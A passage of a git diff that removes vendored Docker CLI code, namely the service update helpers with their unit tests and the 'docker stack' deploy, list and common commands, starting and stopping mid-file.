updateHosts(flags *pflag.FlagSet, hosts *[]string) error { - // Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format) - if flags.Changed(flagHostAdd) { - values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll()) - *hosts = append(*hosts, values...) - } - // Remove duplicate - *hosts = removeDuplicates(*hosts) - - keysToRemove := make(map[string]struct{}) - if flags.Changed(flagHostRemove) { - var empty struct{} - extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll() - for _, entry := range extraHostsToRemove { - key := strings.SplitN(entry, ":", 2)[0] - keysToRemove[key] = empty - } - } - - newHosts := []string{} - for _, entry := range *hosts { - // Since this is in swarmkit format, we need to find the key, which is canonical_hostname of: - // IP_address canonical_hostname [aliases...] - parts := strings.Fields(entry) - if len(parts) > 1 { - key := parts[1] - if _, exists := keysToRemove[key]; !exists { - newHosts = append(newHosts, entry) - } - } else { - newHosts = append(newHosts, entry) - } - } - - // Sort so that result is predictable. - sort.Strings(newHosts) - - *hosts = newHosts - return nil -} - -// updateLogDriver updates the log driver only if the log driver flag is set. -// All options will be replaced with those provided on the command line. 
-func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error { - if !flags.Changed(flagLogDriver) { - return nil - } - - name, err := flags.GetString(flagLogDriver) - if err != nil { - return err - } - - if name == "" { - return nil - } - - taskTemplate.LogDriver = &swarm.Driver{ - Name: name, - Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()), - } - - return nil -} - -func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error { - if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { - return nil - } - if containerSpec.Healthcheck == nil { - containerSpec.Healthcheck = &container.HealthConfig{} - } - noHealthcheck, err := flags.GetBool(flagNoHealthcheck) - if err != nil { - return err - } - if noHealthcheck { - if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { - containerSpec.Healthcheck = &container.HealthConfig{ - Test: []string{"NONE"}, - } - return nil - } - return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) - } - if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" { - containerSpec.Healthcheck.Test = nil - } - if flags.Changed(flagHealthInterval) { - val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value() - containerSpec.Healthcheck.Interval = val - } - if flags.Changed(flagHealthTimeout) { - val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value() - containerSpec.Healthcheck.Timeout = val - } - if flags.Changed(flagHealthRetries) { - containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries) - } - if flags.Changed(flagHealthCmd) { - cmd, _ := flags.GetString(flagHealthCmd) - if cmd != "" { - containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd} - } else { - containerSpec.Healthcheck.Test = nil - } - } - return nil -} diff --git 
a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go deleted file mode 100644 index 08fe248769..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/update_test.go +++ /dev/null @@ -1,384 +0,0 @@ -package service - -import ( - "reflect" - "sort" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestUpdateServiceArgs(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("args", "the \"new args\"") - - spec := &swarm.ServiceSpec{} - cspec := &spec.TaskTemplate.ContainerSpec - cspec.Args = []string{"old", "args"} - - updateService(flags, spec) - assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"}) -} - -func TestUpdateLabels(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("label-add", "toadd=newlabel") - flags.Set("label-rm", "toremove") - - labels := map[string]string{ - "toremove": "thelabeltoremove", - "tokeep": "value", - } - - updateLabels(flags, &labels) - assert.Equal(t, len(labels), 2) - assert.Equal(t, labels["tokeep"], "value") - assert.Equal(t, labels["toadd"], "newlabel") -} - -func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("label-rm", "dne") - - labels := map[string]string{"foo": "theoldlabel"} - updateLabels(flags, &labels) - assert.Equal(t, len(labels), 1) -} - -func TestUpdatePlacement(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("constraint-add", "node=toadd") - flags.Set("constraint-rm", "node!=toremove") - - placement := &swarm.Placement{ - Constraints: []string{"node!=toremove", "container=tokeep"}, - } - - updatePlacement(flags, placement) - assert.Equal(t, len(placement.Constraints), 2) - assert.Equal(t, 
placement.Constraints[0], "container=tokeep") - assert.Equal(t, placement.Constraints[1], "node=toadd") -} - -func TestUpdateEnvironment(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "toadd=newenv") - flags.Set("env-rm", "toremove") - - envs := []string{"toremove=theenvtoremove", "tokeep=value"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 2) - // Order has been removed in updateEnvironment (map) - sort.Strings(envs) - assert.Equal(t, envs[0], "toadd=newenv") - assert.Equal(t, envs[1], "tokeep=value") -} - -func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "foo=newenv") - flags.Set("env-add", "foo=dupe") - flags.Set("env-rm", "foo") - - envs := []string{"foo=value"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 0) -} - -func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) { - // Test case for #25404 - flags := newUpdateCommand(nil).Flags() - flags.Set("env-add", "A=b") - - envs := []string{"A=c"} - - updateEnvironment(flags, &envs) - assert.Equal(t, len(envs), 1) - assert.Equal(t, envs[0], "A=b") -} - -func TestUpdateGroups(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("group-add", "wheel") - flags.Set("group-add", "docker") - flags.Set("group-rm", "root") - flags.Set("group-add", "foo") - flags.Set("group-rm", "docker") - - groups := []string{"bar", "root"} - - updateGroups(flags, &groups) - assert.Equal(t, len(groups), 3) - assert.Equal(t, groups[0], "bar") - assert.Equal(t, groups[1], "foo") - assert.Equal(t, groups[2], "wheel") -} - -func TestUpdateDNSConfig(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - - // IPv4, with duplicates - flags.Set("dns-add", "1.1.1.1") - flags.Set("dns-add", "1.1.1.1") - flags.Set("dns-add", "2.2.2.2") - flags.Set("dns-rm", "3.3.3.3") - flags.Set("dns-rm", "2.2.2.2") - // IPv6 - flags.Set("dns-add", "2001:db8:abc8::1") - // Invalid dns record - 
assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address") - - // domains with duplicates - flags.Set("dns-search-add", "example.com") - flags.Set("dns-search-add", "example.com") - flags.Set("dns-search-add", "example.org") - flags.Set("dns-search-rm", "example.org") - // Invalid dns search domain - assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain") - - flags.Set("dns-option-add", "ndots:9") - flags.Set("dns-option-rm", "timeout:3") - - config := &swarm.DNSConfig{ - Nameservers: []string{"3.3.3.3", "5.5.5.5"}, - Search: []string{"localdomain"}, - Options: []string{"timeout:3"}, - } - - updateDNSConfig(flags, &config) - - assert.Equal(t, len(config.Nameservers), 3) - assert.Equal(t, config.Nameservers[0], "1.1.1.1") - assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1") - assert.Equal(t, config.Nameservers[2], "5.5.5.5") - - assert.Equal(t, len(config.Search), 2) - assert.Equal(t, config.Search[0], "example.com") - assert.Equal(t, config.Search[1], "localdomain") - - assert.Equal(t, len(config.Options), 1) - assert.Equal(t, config.Options[0], "ndots:9") -} - -func TestUpdateMounts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("mount-add", "type=volume,source=vol2,target=/toadd") - flags.Set("mount-rm", "/toremove") - - mounts := []mounttypes.Mount{ - {Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind}, - {Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind}, - } - - updateMounts(flags, &mounts) - assert.Equal(t, len(mounts), 2) - assert.Equal(t, mounts[0].Target, "/toadd") - assert.Equal(t, mounts[1].Target, "/tokeep") - -} - -func TestUpdateMountsWithDuplicateMounts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("mount-add", "type=volume,source=vol4,target=/toadd") - - mounts := []mounttypes.Mount{ - {Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind}, - {Target: "/toadd", Source: "vol2", Type: 
mounttypes.TypeBind}, - {Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind}, - } - - updateMounts(flags, &mounts) - assert.Equal(t, len(mounts), 3) - assert.Equal(t, mounts[0].Target, "/tokeep1") - assert.Equal(t, mounts[1].Target, "/tokeep2") - assert.Equal(t, mounts[2].Target, "/toadd") -} - -func TestUpdatePorts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "1000:1000") - flags.Set("publish-rm", "333/udp") - - portConfigs := []swarm.PortConfig{ - {TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP}, - {TargetPort: 555}, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 2) - // Do a sort to have the order (might have changed by map) - targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)} - sort.Ints(targetPorts) - assert.Equal(t, targetPorts[0], 555) - assert.Equal(t, targetPorts[1], 1000) -} - -func TestUpdatePortsDuplicate(t *testing.T) { - // Test case for #25375 - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "80:80") - - portConfigs := []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 80, - Protocol: swarm.PortConfigProtocolTCP, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 1) - assert.Equal(t, portConfigs[0].TargetPort, uint32(80)) -} - -func TestUpdateHealthcheckTable(t *testing.T) { - type test struct { - flags [][2]string - initial *container.HealthConfig - expected *container.HealthConfig - err string - } - testCases := []test{ - { - flags: [][2]string{{"no-healthcheck", "true"}}, - initial: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Test: []string{"NONE"}}, - }, - { - flags: [][2]string{{"health-cmd", "cmd1"}}, - initial: &container.HealthConfig{Test: []string{"NONE"}}, - expected: 
&container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}}, - }, - { - flags: [][2]string{{"health-retries", "10"}}, - initial: &container.HealthConfig{Test: []string{"NONE"}}, - expected: &container.HealthConfig{Retries: 10}, - }, - { - flags: [][2]string{{"health-retries", "10"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - }, - { - flags: [][2]string{{"health-interval", "1m"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute}, - }, - { - flags: [][2]string{{"health-cmd", ""}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Retries: 10}, - }, - { - flags: [][2]string{{"health-retries", "0"}}, - initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, - expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, - }, - { - flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - { - flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - { - flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}}, - err: "--no-healthcheck conflicts with --health-* options", - }, - } - for i, c := range testCases { - flags := newUpdateCommand(nil).Flags() - for _, flag := range c.flags { - flags.Set(flag[0], flag[1]) - } - cspec := &swarm.ContainerSpec{ - Healthcheck: c.initial, - } - err := updateHealthcheck(flags, cspec) - if c.err != "" { - assert.Error(t, err, c.err) - } else { - assert.NilError(t, err) - if !reflect.DeepEqual(cspec.Healthcheck, c.expected) { - t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck) - } - } 
- } -} - -func TestUpdateHosts(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("host-add", "example.net:2.2.2.2") - flags.Set("host-add", "ipv6.net:2001:db8:abc8::1") - // remove with ipv6 should work - flags.Set("host-rm", "example.net:2001:db8:abc8::1") - // just hostname should work as well - flags.Set("host-rm", "example.net") - // bad format error - assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:") - - hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"} - - updateHosts(flags, &hosts) - assert.Equal(t, len(hosts), 3) - assert.Equal(t, hosts[0], "1.2.3.4 example.com") - assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net") - assert.Equal(t, hosts[2], "4.3.2.1 example.org") -} - -func TestUpdatePortsRmWithProtocol(t *testing.T) { - flags := newUpdateCommand(nil).Flags() - flags.Set("publish-add", "8081:81") - flags.Set("publish-add", "8082:82") - flags.Set("publish-rm", "80") - flags.Set("publish-rm", "81/tcp") - flags.Set("publish-rm", "82/udp") - - portConfigs := []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - Protocol: swarm.PortConfigProtocolTCP, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - } - - err := updatePorts(flags, &portConfigs) - assert.Equal(t, err, nil) - assert.Equal(t, len(portConfigs), 2) - assert.Equal(t, portConfigs[0].TargetPort, uint32(81)) - assert.Equal(t, portConfigs[1].TargetPort, uint32(82)) -} - -// FIXME(vdemeester) port to opts.PortOpt -func TestValidatePort(t *testing.T) { - validPorts := []string{"80/tcp", "80", "80/udp"} - invalidPorts := map[string]string{ - "9999999": "out of range", - "80:80/tcp": "invalid port format", - "53:53/udp": "invalid port format", - "80:80": "invalid port format", - "80/xyz": "invalid protocol", - "tcp": "invalid syntax", - "udp": "invalid syntax", - "": "invalid protocol", - } - for _, port := range validPorts { - _, err := validatePublishRemove(port) - assert.Equal(t, 
err, nil) - } - for port, e := range invalidPorts { - _, err := validatePublishRemove(port) - assert.Error(t, err, e) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go deleted file mode 100644 index 860bfedd1a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/cmd.go +++ /dev/null @@ -1,35 +0,0 @@ -package stack - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewStackCommand returns a cobra command for `stack` subcommands -func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "stack", - Short: "Manage Docker stacks", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - Tags: map[string]string{"version": "1.25"}, - } - cmd.AddCommand( - newDeployCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newServicesCommand(dockerCli), - newPsCommand(dockerCli), - ) - return cmd -} - -// NewTopLevelDeployCommand returns a command for `docker deploy` -func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := newDeployCommand(dockerCli) - // Remove the aliases at the top level - cmd.Aliases = []string{} - cmd.Tags = map[string]string{"experimental": "", "version": "1.25"} - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go deleted file mode 100644 index 72719f94fc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/common.go +++ /dev/null @@ -1,60 +0,0 @@ -package stack - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" -) - -func 
getStackFilter(namespace string) filters.Args { - filter := filters.NewArgs() - filter.Add("label", convert.LabelNamespace+"="+namespace) - return filter -} - -func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args { - filter := opt.Value() - filter.Add("label", convert.LabelNamespace+"="+namespace) - return filter -} - -func getAllStacksFilter() filters.Args { - filter := filters.NewArgs() - filter.Add("label", convert.LabelNamespace) - return filter -} - -func getServices( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]swarm.Service, error) { - return apiclient.ServiceList( - ctx, - types.ServiceListOptions{Filters: getStackFilter(namespace)}) -} - -func getStackNetworks( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]types.NetworkResource, error) { - return apiclient.NetworkList( - ctx, - types.NetworkListOptions{Filters: getStackFilter(namespace)}) -} - -func getStackSecrets( - ctx context.Context, - apiclient client.APIClient, - namespace string, -) ([]swarm.Secret, error) { - return apiclient.SecretList( - ctx, - types.SecretListOptions{Filters: getStackFilter(namespace)}) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go deleted file mode 100644 index 980876a6a1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/deploy.go +++ /dev/null @@ -1,357 +0,0 @@ -package stack - -import ( - "fmt" - "io/ioutil" - "os" - "sort" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - secretcli "github.com/docker/docker/cli/command/secret" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/cli/compose/loader" - composetypes "github.com/docker/docker/cli/compose/types" - dockerclient "github.com/docker/docker/client" - "github.com/pkg/errors" 
- "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -const ( - defaultNetworkDriver = "overlay" -) - -type deployOptions struct { - bundlefile string - composefile string - namespace string - sendRegistryAuth bool -} - -func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts deployOptions - - cmd := &cobra.Command{ - Use: "deploy [OPTIONS] STACK", - Aliases: []string{"up"}, - Short: "Deploy a new stack or update an existing stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runDeploy(dockerCli, opts) - }, - } - - flags := cmd.Flags() - addBundlefileFlag(&opts.bundlefile, flags) - addComposefileFlag(&opts.composefile, flags) - addRegistryAuthFlag(&opts.sendRegistryAuth, flags) - return cmd -} - -func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error { - ctx := context.Background() - - switch { - case opts.bundlefile == "" && opts.composefile == "": - return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).") - case opts.bundlefile != "" && opts.composefile != "": - return fmt.Errorf("You cannot specify both a bundle file and a Compose file.") - case opts.bundlefile != "": - return deployBundle(ctx, dockerCli, opts) - default: - return deployCompose(ctx, dockerCli, opts) - } -} - -// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is -// a swarm manager. This is necessary because we must create networks before we -// create services, but the API call for creating a network does not return a -// proper status code when it can't create a network in the "global" scope. -func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error { - info, err := dockerCli.Client().Info(ctx) - if err != nil { - return err - } - if !info.Swarm.ControlAvailable { - return errors.New("This node is not a swarm manager. 
Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") - } - return nil -} - -func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { - configDetails, err := getConfigDetails(opts) - if err != nil { - return err - } - - config, err := loader.Load(configDetails) - if err != nil { - if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok { - return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n", - propertyWarnings(fpe.Properties)) - } - - return err - } - - unsupportedProperties := loader.GetUnsupportedProperties(configDetails) - if len(unsupportedProperties) > 0 { - fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n", - strings.Join(unsupportedProperties, ", ")) - } - - deprecatedProperties := loader.GetDeprecatedProperties(configDetails) - if len(deprecatedProperties) > 0 { - fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n", - propertyWarnings(deprecatedProperties)) - } - - if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { - return err - } - - namespace := convert.NewNamespace(opts.namespace) - - serviceNetworks := getServicesDeclaredNetworks(config.Services) - networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks) - if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil { - return err - } - if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { - return err - } - - secrets, err := convert.Secrets(namespace, config.Secrets) - if err != nil { - return err - } - if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil { - return err - } - - services, err := convert.Services(namespace, config, dockerCli.Client()) - if err != nil { - return err - } - return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) -} -func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) 
map[string]struct{} { - serviceNetworks := map[string]struct{}{} - for _, serviceConfig := range serviceConfigs { - if len(serviceConfig.Networks) == 0 { - serviceNetworks["default"] = struct{}{} - continue - } - for network := range serviceConfig.Networks { - serviceNetworks[network] = struct{}{} - } - } - return serviceNetworks -} - -func propertyWarnings(properties map[string]string) string { - var msgs []string - for name, description := range properties { - msgs = append(msgs, fmt.Sprintf("%s: %s", name, description)) - } - sort.Strings(msgs) - return strings.Join(msgs, "\n\n") -} - -func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) { - var details composetypes.ConfigDetails - var err error - - details.WorkingDir, err = os.Getwd() - if err != nil { - return details, err - } - - configFile, err := getConfigFile(opts.composefile) - if err != nil { - return details, err - } - // TODO: support multiple files - details.ConfigFiles = []composetypes.ConfigFile{*configFile} - return details, nil -} - -func getConfigFile(filename string) (*composetypes.ConfigFile, error) { - bytes, err := ioutil.ReadFile(filename) - if err != nil { - return nil, err - } - config, err := loader.ParseYAML(bytes) - if err != nil { - return nil, err - } - return &composetypes.ConfigFile{ - Filename: filename, - Config: config, - }, nil -} - -func validateExternalNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - externalNetworks []string) error { - client := dockerCli.Client() - - for _, networkName := range externalNetworks { - network, err := client.NetworkInspect(ctx, networkName) - if err != nil { - if dockerclient.IsErrNetworkNotFound(err) { - return fmt.Errorf("network %q is declared as external, but could not be found. 
You need to create the network before the stack is deployed (with overlay driver)", networkName) - } - return err - } - if network.Scope != "swarm" { - return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm") - } - } - - return nil -} - -func createSecrets( - ctx context.Context, - dockerCli *command.DockerCli, - namespace convert.Namespace, - secrets []swarm.SecretSpec, -) error { - client := dockerCli.Client() - - for _, secretSpec := range secrets { - // TODO: fix this after https://github.com/docker/docker/pull/29218 - secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name}) - switch { - case err != nil: - return err - case len(secrets) > 1: - return errors.Errorf("ambiguous secret name: %s", secretSpec.Name) - case len(secrets) == 0: - fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name) - _, err = client.SecretCreate(ctx, secretSpec) - default: - secret := secrets[0] - // Update secret to ensure that the local data hasn't changed - err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec) - } - if err != nil { - return err - } - } - return nil -} - -func createNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - namespace convert.Namespace, - networks map[string]types.NetworkCreate, -) error { - client := dockerCli.Client() - - existingNetworks, err := getStackNetworks(ctx, client, namespace.Name()) - if err != nil { - return err - } - - existingNetworkMap := make(map[string]types.NetworkResource) - for _, network := range existingNetworks { - existingNetworkMap[network.Name] = network - } - - for internalName, createOpts := range networks { - name := namespace.Scope(internalName) - if _, exists := existingNetworkMap[name]; exists { - continue - } - - if createOpts.Driver == "" { - createOpts.Driver = defaultNetworkDriver - } - - fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name) 
- if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil { - return err - } - } - - return nil -} - -func deployServices( - ctx context.Context, - dockerCli *command.DockerCli, - services map[string]swarm.ServiceSpec, - namespace convert.Namespace, - sendAuth bool, -) error { - apiClient := dockerCli.Client() - out := dockerCli.Out() - - existingServices, err := getServices(ctx, apiClient, namespace.Name()) - if err != nil { - return err - } - - existingServiceMap := make(map[string]swarm.Service) - for _, service := range existingServices { - existingServiceMap[service.Spec.Name] = service - } - - for internalName, serviceSpec := range services { - name := namespace.Scope(internalName) - - encodedAuth := "" - if sendAuth { - // Retrieve encoded auth token from the image reference - image := serviceSpec.TaskTemplate.ContainerSpec.Image - encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) - if err != nil { - return err - } - } - - if service, exists := existingServiceMap[name]; exists { - fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID) - - updateOpts := types.ServiceUpdateOptions{} - if sendAuth { - updateOpts.EncodedRegistryAuth = encodedAuth - } - response, err := apiClient.ServiceUpdate( - ctx, - service.ID, - service.Version, - serviceSpec, - updateOpts, - ) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - } else { - fmt.Fprintf(out, "Creating service %s\n", name) - - createOpts := types.ServiceCreateOptions{} - if sendAuth { - createOpts.EncodedRegistryAuth = encodedAuth - } - if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil { - return err - } - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go deleted file mode 100644 index 5a178c4ab6..0000000000 --- 
a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go +++ /dev/null @@ -1,83 +0,0 @@ -package stack - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/compose/convert" -) - -func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { - bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile) - if err != nil { - return err - } - - if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { - return err - } - - namespace := convert.NewNamespace(opts.namespace) - - networks := make(map[string]types.NetworkCreate) - for _, service := range bundle.Services { - for _, networkName := range service.Networks { - networks[networkName] = types.NetworkCreate{ - Labels: convert.AddStackLabel(namespace, nil), - } - } - } - - services := make(map[string]swarm.ServiceSpec) - for internalName, service := range bundle.Services { - name := namespace.Scope(internalName) - - var ports []swarm.PortConfig - for _, portSpec := range service.Ports { - ports = append(ports, swarm.PortConfig{ - Protocol: swarm.PortConfigProtocol(portSpec.Protocol), - TargetPort: portSpec.Port, - }) - } - - nets := []swarm.NetworkAttachmentConfig{} - for _, networkName := range service.Networks { - nets = append(nets, swarm.NetworkAttachmentConfig{ - Target: namespace.Scope(networkName), - Aliases: []string{networkName}, - }) - } - - serviceSpec := swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: name, - Labels: convert.AddStackLabel(namespace, service.Labels), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: service.Image, - Command: service.Command, - Args: service.Args, - Env: service.Env, - // Service Labels will not be copied to Containers - // automatically during the deployment so we apply - // it here. 
- Labels: convert.AddStackLabel(namespace, nil), - }, - }, - EndpointSpec: &swarm.EndpointSpec{ - Ports: ports, - }, - Networks: nets, - } - - services[internalName] = serviceSpec - } - - if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { - return err - } - return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go deleted file mode 100644 index 9b6c645e29..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/list.go +++ /dev/null @@ -1,113 +0,0 @@ -package stack - -import ( - "fmt" - "io" - "strconv" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/compose/convert" - "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -const ( - listItemFmt = "%s\t%s\n" -) - -type listOptions struct { -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{} - - cmd := &cobra.Command{ - Use: "ls", - Aliases: []string{"list"}, - Short: "List stacks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - stacks, err := getStacks(ctx, client) - if err != nil { - return err - } - - out := dockerCli.Out() - printTable(out, stacks) - return nil -} - -func printTable(out io.Writer, stacks []*stack) { - writer := tabwriter.NewWriter(out, 0, 4, 